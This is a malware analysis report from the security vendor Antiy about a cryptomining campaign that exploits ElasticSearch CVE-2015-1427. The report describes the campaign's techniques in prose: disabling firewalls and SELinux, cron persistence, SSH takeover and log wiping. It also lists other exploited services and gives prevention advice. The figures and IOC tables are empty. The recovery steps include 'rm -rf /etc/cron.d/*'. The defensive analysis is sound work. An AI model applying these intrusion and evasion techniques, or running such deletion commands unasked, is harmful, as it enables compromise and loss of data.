For secure defense on our E-Planet

The Event Analysis of Antiy Honeynet Capturing “Monroe Mining with ElasticSearch Groovy Vulnerability (Dog)”


On June 13, 2019, the Attack Capture System of Antiy
captured the attack that exploits the CVE-2015-1427 (ElasticSearch
Groovy) remote command execution vulnerability. The principle of the
vulnerability is that Elaticsearch uses groovy as a scripting language
and uses a sandbox mechanism based on black and white list to limit
dangerous code execution, but the mechanism is not strict enough and can
be bypassed, resulting in remote code execution. Antiy conducted a
detailed sample analysis of the incident and made recommendations for
prevention and repair.

2、Sample Analysis

2.1 Critical Payload

From the perspective of payload, the attacker uses
groovy as a scripting language and sends a json script with a malicious
link to to the
_search?pretty page for malicious shell script download, so as to
perform the remote code attack and mining.

Figure 2-1 Data Packet Content

After decryption, the core code is:

Figure 2-2 Core Code

2.2 Sample Analysis

1) Analysis of Intrusion Script—

The attacker downloads and executes the malicious
script to implant the Dog mining program via, and do a series of
operations to host such as scanning.

Figure 2-3 Turn Off the Firewall

After that, it turns off the firewall, shuts down
selinux and releases the occupied resources, kills other processes
related to mining, sets the timed tasks (downloads the executable file every 30 minutes), obtains ssh permissions, forwards and
modifies the iptables rules, and cleans up the related operation
history, logs and other operations.

Figure 2-4 Checks and Kills Other Existing Mining Processes

Figure 2-5 Setting the Timed Task

Figure 2-6 Malicious Script Download Address, Backup Address and Size Settings

Figure 2-7 Clearing Related Logs and History

In this process, the script checks whether the three
processes of sysupdate, networkservice and sysguard) are running, and
starts them if not.

Figure 2-8 When One of Them Is Killed, the Schedule File Restarts

2) Sample Analysis—sysguard、networkservice、sysupdate

The three samples are written in Go language and
shelled with UPX. The corresponding main_main function structures are as

Figure 2-9 The Function Structure of sysguard-main_main

Figure 2-10 The Function Structure of networkservice-main_main

Figure 2-11 sysupdate-main Function

Compared with the previously captured systemctI
sample, it is found that the attack is divided into three processes:
mining, scanning and function calling. Moreover, related vulnerability
exploitation function and scan function are found in networkservice

Figure 2-12 networkservice Scanning Function

By comparing the previously captured samples, we find
that the attack techniques are similar, except that this attack is
jointly carried out by sysguard, networkservice (scanning) and
sysupdate. This also means that the three processes should all be killed
if the server is diagnosed to be infected.

3) Configuration File—config.json

In the downloaded configuration file, we find multiple mining pools addresses:

Table 2-1 List of Mining Pools

Mining Pools

Figure 2-13 Configuration File

3、Affected Services and Vulnerabilities

Table 3-1 Affected Services and Vulnerabilities

Services Vulnerabilities
Weblogic CVE-2017-10271
Thinkphp5 Remote code execution
Spring Data Commons CVE-2018-1273
Hadoop Unauthorized access
ElasticSearch CVE-2014-3120  CVE-2015-1427
Drupal CVE-2018-7600
Redis Unauthorized access
SQL Server Weak password


Table 4-1 Attack IP

IP Geographic Position USA China – Heilongjiang – Harbin US-Colorado-Littleton China-Henan-Kaifeng Germany – Hessen – Frankfurt

Table 4-2 URL


Table 4-3 MD5


5、Recommendations for Prevention and Repair

Recommendations for Prevention:

a) Ensure that the system and application download and update the latest patches provided by the authorities on a regular basis;

b) Prohibit the use of weak passwords;

c) Regularly check server anomalies, such as continuous high CPU usage and disk exceptions;

d) Install endpoint threat security product—Antiy
Intelligent Endpoint Protection System. Antiy Intelligent Endpoint
Protection System can customize the exclusive security baseline for you
to create a secure intranet environment. At the same time, with its
document security protection function, Whole network virus fixed point
clear function, and the security protection function of domestic
operating system, it can better solve your security problems and protect
your server.

Recommendations for Recovery:

a) Disconnect network, back up important crontab, close or delete timed tasks: systemctl stop crontab or rm -rf /etc/cron.d/*;

b) Lock malicious files in the crontab;

c) Check and kill the virus process: kill sysguard, networkservice, sysupdate three processes at the same time;

d) Delete virus-related files;;

e) After confirming there is no error, restart the
server, install the vulnerability patch and use the Antiy Intelligent
Endpoint Protection System to prevent risk and protect the security of
the server.

Appendix I: Reference linking

[1] Reversing GO binaries like a pro: